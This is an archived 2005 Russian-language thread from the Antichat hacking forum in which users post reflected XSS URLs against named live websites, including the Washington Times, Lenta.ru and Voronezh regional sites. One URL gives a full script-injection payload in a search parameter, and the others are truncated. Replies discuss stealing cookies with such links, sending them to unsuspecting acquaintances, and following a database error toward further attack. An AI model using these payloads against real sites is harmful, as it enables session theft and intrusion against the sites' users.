Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Xss Вашингтон таймс (https://forum.antichat.xyz/showthread.php?t=9736)

Dmitro 27.09.2005 20:56
Xss Вашингтон таймс
 
хм... такой крупный сайт, а XSS ... не хорошо ((

www.washtimes.com
Например:
Справа форма поиска "Quick Search" - вводи чё хошь...

http://www.washtimes.com/archive/index.php?Action=Go&Keywords='%3E%3Cscript%3Ealert ()%3C/script%3E

кстати, вот ещё на лента.ру :
http://lenta.ru/Search?Search="><scr...cript>&x=7&y=7

и вот:
http://www.voronezh.ru/cgi-bin/yp.pl...E+%22&x=25&y=3

и вот:
http://hosting.vrn.ru/cgi-bin/search...te=1&x=30&y=12

и вот:
http://www.084.vrn.ru/cgi-bin/search...&il=0&x=25&y=8

А вообще XSS в поисковике... - это щас модно)))

Mastermind 27.09.2005 21:09
А что собственно могут дать такого рода Xss?

k1b0rg 27.09.2005 21:14
практически ничего, можно куки украсть.

Dmitro 27.09.2005 21:24
Цитата:
Сообщение от k1b0rg
практически ничего, можно куки украсть.
Да не скажи... на вашингтон таймс ещё и ошибку мускуля выдало... Тут уж и поработать мона )))

Mastermind 27.09.2005 21:24
k1b0rg, отправив ссылку другу, месяц знакомому с компом?


Время: 10:53